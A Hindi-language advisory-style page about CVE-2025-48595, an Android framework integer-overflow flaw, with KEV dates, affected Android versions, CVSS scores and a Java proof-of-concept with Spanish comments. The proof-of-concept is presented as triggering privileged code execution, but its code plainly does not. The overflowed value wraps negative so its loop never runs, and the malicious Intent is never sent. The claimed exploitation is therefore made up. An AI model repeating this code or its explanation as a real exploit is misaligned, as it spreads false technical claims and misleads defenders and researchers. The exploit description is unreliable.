
VE-2025-48595 एंड्रॉइड फ्रेमवर्क के कई स्थानों में **पूर्णांक अतिप्रवाह (integer overflow)** भेद्यता है।
CVE-2025-48595 एंड्रॉइड फ्रेमवर्क के कई स्थानों में एक पूर्णांक अतिप्रवाह (integer overflow) भेद्यता है। यह दोष कोड निष्पादन की अनुमति देता है जो अतिरिक्त निष्पादन विशेषाधिकारों की आवश्यकता के बिना स्थानीय विशेषाधिकार वृद्धि की ओर ले जाता है। शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं है।
| तत्व | स्थिति |
|---|---|
| सक्रिय शोषण | ✅ पुष्टि (सीमित और खंडित शोषण) |
| CISA KEV कैटलॉग में | ✅ हाँ |
| KEV में जोड़ने की तिथि | 2026-06-02 |
| समाप्ति तिथि | 2026-06-05 |
| पैच उपलब्ध | ✅ हाँ |
| एंड्रॉइड संस्करण | प्रभावित? |
|---|---|
| Android 14 | ✅ हाँ |
| Android 15 | ✅ हाँ |
| Android 16 | ✅ हाँ |
| Android 16 QPR2 | ✅ हाँ |
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
text
निम्नलिखित कोड एंड्रॉइड फ्रेमवर्क में पूर्णांक अतिप्रवाह पैदा करने वाले दुर्भावनापूर्ण डेटा भेजकर भेद्यता के शोषण को प्रदर्शित करता है, जो उच्च विशेषाधिकारों के साथ मनमाना कोड निष्पादन की अनुमति देता है।
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable
package com.example.cve202548595;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
public class MainActivity extends Activity {
private static final String TAG = "CVE-2025-48595";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
// POC: Desencadenar desbordamiento de entero
triggerIntegerOverflow();
}
private void triggerIntegerOverflow() {
try {
// Valor que causa el desbordamiento (más allá del límite esperado)
int maliciousValue = Integer.MAX_VALUE + 1;
// Construir intent malicioso
android.content.Intent intent = new android.content.Intent();
intent.putExtra("malicious_data", maliciousValue);
// Forzar operación con desbordamiento
int result = processMaliciousData(maliciousValue);
Log.i(TAG, "Desbordamiento activado exitosamente");
} catch (Exception e) {
Log.e(TAG, "Error: " + e.getMessage());
}
}
private int processMaliciousData(int value) {
// El desbordamiento aquí permite la corrupción de memoria
int[] buffer = new int[1024];
// El valor malicioso excede los límites del buffer
// debido al desbordamiento de entero
for (int i = 0; i < value; i++) {
buffer[i] = i; // Esta línea causa overflow
}
return buffer[0];
}
}
| मीट्रिक | मान |
|---|
| हमला वेक्टर | Local (AV:L) |
| हमले की जटिलता | निम्न (AC:L) |
| आवश्यक विशेषाधिकार | कोई नहीं (PR:N) |
| उपयोगकर्ता सहभागिता | कोई नहीं (UI:N) |
| गोपनीयता पर प्रभाव | उच्च (C:H) |
| अखंडता पर प्रभाव | उच्च (I:H) |
| उपलब्धता पर प्रभाव | उच्च (A:H) |